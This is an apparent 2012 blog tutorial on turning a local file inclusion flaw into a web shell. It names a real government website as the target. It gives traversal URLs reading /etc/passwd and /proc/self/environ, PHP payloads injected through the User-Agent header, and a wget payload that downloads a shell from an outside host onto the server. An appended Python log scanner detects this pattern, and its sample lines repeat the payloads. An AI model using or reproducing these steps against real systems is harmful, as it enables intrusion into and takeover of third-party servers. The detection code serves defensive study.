Those dorks are about as basic as they get; sorry if they do not satisfy you. I rarely use dorks, and with this tutorial you shouldn't need dorks to find a vulnerable site. XSS is a very common vulnerability; I even found some in Google, and some on HackForums too. XSS isn't very high priority, at least not non-persistent XSS.

Monday, August 27, 2012

Local File Inclusion to shell upload




Things you will need:

1) Site vulnerable to LFI ( http://www.bislig.gov.ph )
2) Remote shell ( http://www.sh3ll.org/egy.txt )
3) User-Agent switcher ( https://addons.mozilla.org/en-US/firefox/addon/user-agent-switcher/ )
4) Mozilla Firefox

First of all, check whether your site is vulnerable to LFI (I'm not going to explain how to find or exploit it).
Try to open etc/passwd.

Example:

Code:
http://www.bislig.gov.ph/content1.php?page=5&directLinks=../../../../../../../../../../../../../../etc/passwd


OK, fine... we can open etc/passwd.
Now try proc/self/environ.

Example:

Code:
http://www.bislig.gov.ph/content1.php?page=5&directLinks=../../../../../../../../../../../../../../proc/self/environ


Now download and install User-Agent switcher.

Go to Tools > Default User-Agent > Edit User Agents
You will get this window.

Now make new user-agent
Go to New > New User-Agent



Now leave everything as it is except the description and the user-agent.
In the description enter a name for it (mine is phpinfo).

In User-Agent, paste this:


Code:
<?php phpinfo();?>


Select your User-Agent in Tools > Default User Agent > PHP Info (or whatever your User-Agent is called).

Go to your site and refresh it.




Now search for "disable_functions" (Ctrl+F Search function)

Mine is

Code:
disable_functions     | no value    | no value


That is good. We can spawn our shell now!

Now go back and edit your User-Agent.

Change "User-Agent" to:

Code:
<?exec('wget http://www.sh3ll.org/egy.txt -O shell.php');?>


(What does this do? It downloads the shell in .txt format and saves it as shell.php.)

Save it and refresh your site.

Go to http://www.yourLFIsite.com/shell.php (Mine is http://www.bislig.gov.ph/shell.php )

Voila, we have our shell up.
Enjoy.
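As an added example (not from the original post), the defender's view of the same request sequence: a log check that flags the request shapes the technique depends on, i.e. a traversal to /etc/passwd or /proc/self/environ in a query parameter, a PHP open tag in the User-Agent header, and the two combined, which is the header-injection-through-environ pattern. The log lines are constructed for this example (documentation IP ranges, parameter names as shown above) and the function names are this example's own.

```python
import re
from typing import List, Optional
from urllib.parse import unquote

# Constructed Apache combined-format lines; 203.0.113.x / 198.51.100.x are
# documentation addresses and the paths mirror the request shapes shown above.
SAMPLE_LOG = """\
203.0.113.5 - - [27/Aug/2012:10:01:02 +0000] "GET /content1.php?page=5&directLinks=../../../../etc/passwd HTTP/1.1" 200 2310 "-" "Mozilla/5.0"
203.0.113.5 - - [27/Aug/2012:10:01:40 +0000] "GET /content1.php?page=5&directLinks=../../../../proc/self/environ HTTP/1.1" 200 4096 "-" "<?php phpinfo();?>"
198.51.100.7 - - [27/Aug/2012:10:02:11 +0000] "GET /content1.php?page=5 HTTP/1.1" 200 8812 "-" "Mozilla/5.0"
203.0.113.5 - - [27/Aug/2012:10:03:00 +0000] "GET /content1.php?page=5&directLinks=..%2F..%2F..%2Fproc%2Fself%2Fenviron HTTP/1.1" 200 4096 "-" "<?php phpinfo();?>"
"""

_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Two or more "../" segments followed by one of the files the technique reads.
_TRAVERSAL = re.compile(r"(?:\.\./){2,}.*?(?:etc/passwd|proc/self/environ)")
# A PHP open tag has no business in a User-Agent header.
_PHP_TAG = re.compile(r"<\?")


def flag_line(line: str) -> Optional[dict]:
    """Return a finding for one access-log line, or None if it looks benign."""
    m = _LINE.match(line)
    if not m:
        return None
    target = unquote(m["target"])          # normalise %2F etc. before matching
    reasons: List[str] = []
    if _TRAVERSAL.search(target):
        reasons.append("traversal to sensitive file")
    if _PHP_TAG.search(m["ua"]):
        reasons.append("php tag in user-agent")
    if "proc/self/environ" in target and _PHP_TAG.search(m["ua"]):
        # Together these are the include-your-own-request-headers pattern.
        reasons.append("environ include with code in header")
    if not reasons:
        return None
    return {"ip": m["ip"], "time": m["ts"], "target": target,
            "user_agent": m["ua"], "reasons": reasons}


def scan(log: str) -> List[dict]:
    """Run flag_line over every line of `log` and keep the findings."""
    return [f for f in (flag_line(line) for line in log.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["ip"], finding["target"], "->", ", ".join(finding["reasons"]))
```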